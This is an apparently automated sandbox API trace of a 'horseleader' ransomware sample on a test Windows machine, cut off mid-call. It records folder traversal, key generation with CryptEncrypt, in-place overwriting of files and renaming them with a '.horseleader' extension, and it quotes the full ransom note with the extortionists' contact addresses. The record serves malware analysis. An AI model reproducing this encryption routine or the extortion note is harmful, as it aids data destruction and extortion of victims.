GetProcessHeap () returned 0x780000 [0249.199] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0249.199] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 0 [0249.199] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0249.199] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\#Decrypt#.txt") returned 72 [0249.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0249.203] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0249.203] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0249.204] lstrlenA (lpString="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") returned 1368 [0249.204] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0249.204] CloseHandle (hObject=0x21c) returned 1 [0249.204] GetProcessHeap () returned 0x780000 [0249.205] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0249.205] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VBA", cAlternateFileName="")) returned 1 [0249.205] lstrcmpiW (lpString1="VBA", lpString2="Windows") returned -1 [0249.205] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned 54 [0249.205] lstrcmpW (lpString1="VBA", lpString2=".") returned 1 [0249.205] lstrcmpW (lpString1="VBA", lpString2="..") returned 1 [0249.205] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.205] GetProcessHeap () returned 0x780000 [0249.205] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7dbfd8 [0249.205] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*") returned 56 [0249.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0249.206] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.206] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\.") returned 56 [0249.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.206] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0249.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.207] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\..") returned 57 [0249.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.207] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBA7", cAlternateFileName="")) returned 1 [0249.207] lstrcmpiW (lpString1="VBA7", lpString2="Windows") returned -1 [0249.207] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned 59 [0249.207] lstrcmpW (lpString1="VBA7", lpString2=".") returned 1 [0249.207] lstrcmpW (lpString1="VBA7", lpString2="..") returned 1 [0249.207] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.207] GetProcessHeap () returned 0x780000 [0249.207] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.207] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*") returned 61 [0249.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0249.208] lstrcmpiW (lpString1=".", lpString2="Windows") 
returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\.") returned 61 [0249.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.208] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 1 [0249.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\..") returned 62 [0249.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.208] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="1033", cAlternateFileName="")) returned 1 [0249.208] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned 64 [0249.208] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0249.208] 
lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0249.208] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.208] GetProcessHeap () returned 0x780000 [0249.208] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0249.209] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*") returned 66 [0249.209] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0249.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.268] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\.") returned 66 [0249.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.269] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="..", cAlternateFileName="")) returned 1 [0249.269] lstrcmpiW 
(lpString1="..", lpString2="Windows") returned -1 [0249.269] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\..") returned 67 [0249.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.269] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1574f00, ftCreationTime.dwHighDateTime=0x1be23e3, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1574f00, ftLastWriteTime.dwHighDateTime=0x1be23e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a5b, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="FM20.CHM", cAlternateFileName="")) returned 1 [0249.270] lstrcmpiW (lpString1="FM20.CHM", lpString2="Windows") returned -1 [0249.270] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0249.270] StrStrIW (lpFirst="FM20.CHM", lpSrch=".horseleader") returned 0x0 [0249.270] lstrcmpW (lpString1="FM20.CHM", lpString2="#Decrypt#.txt") returned 1 [0249.270] lstrcmpW (lpString1="FM20.CHM", lpString2="_uninstalling_.png") returned 1 [0249.270] lstrlenW (lpString=".testttjffg") returned 11 [0249.270] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM", lpSrch=".testttjffg") returned 0x0 [0249.270] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0249.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0249.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0249.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0249.271] StrStrW (lpFirst="FM20.CHM", lpSrch=".txt") returned 0x0 [0249.271] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=334427) returned 1 [0249.271] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.271] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.849] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.850] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.850] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x2652d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.850] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.868] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.868] WriteFile (in: hFile=0x15c, 
lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.868] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x4ca5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.868] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.879] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.879] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.879] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.880] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0249.880] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0249.880] CloseHandle (hObject=0x15c) returned 1 [0249.880] GetProcessHeap () returned 0x780000 [0249.880] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0249.880] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.horseleader") returned 85 
[0249.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.horseleader")) returned 1 [0249.881] GetProcessHeap () returned 0x780000 [0249.882] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0249.882] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edd8500, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6edd8500, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ac96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBCN6.CHM", cAlternateFileName="")) returned 1 [0249.882] lstrcmpiW (lpString1="VBCN6.CHM", lpString2="Windows") returned -1 [0249.882] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0249.882] StrStrIW (lpFirst="VBCN6.CHM", lpSrch=".horseleader") returned 0x0 [0249.882] lstrcmpW (lpString1="VBCN6.CHM", lpString2="#Decrypt#.txt") returned 1 [0249.882] lstrcmpW (lpString1="VBCN6.CHM", lpString2="_uninstalling_.png") returned 1 [0249.882] lstrlenW (lpString=".testttjffg") returned 11 [0249.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM", lpSrch=".testttjffg") returned 0x0 [0249.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0249.882] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0249.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0249.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0249.884] StrStrW (lpFirst="VBCN6.CHM", lpSrch=".txt") returned 0x0 [0249.884] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=109718) returned 1 [0249.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.885] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.997] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.997] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.997] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xae4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.997] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, 
lpOverlapped=0x0) returned 1 [0250.055] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x15c96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.056] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.057] CloseHandle (hObject=0x15c) returned 1 [0250.057] GetProcessHeap () returned 0x780000 [0250.057] RtlAllocateHeap (HeapHandle=0x780000, 
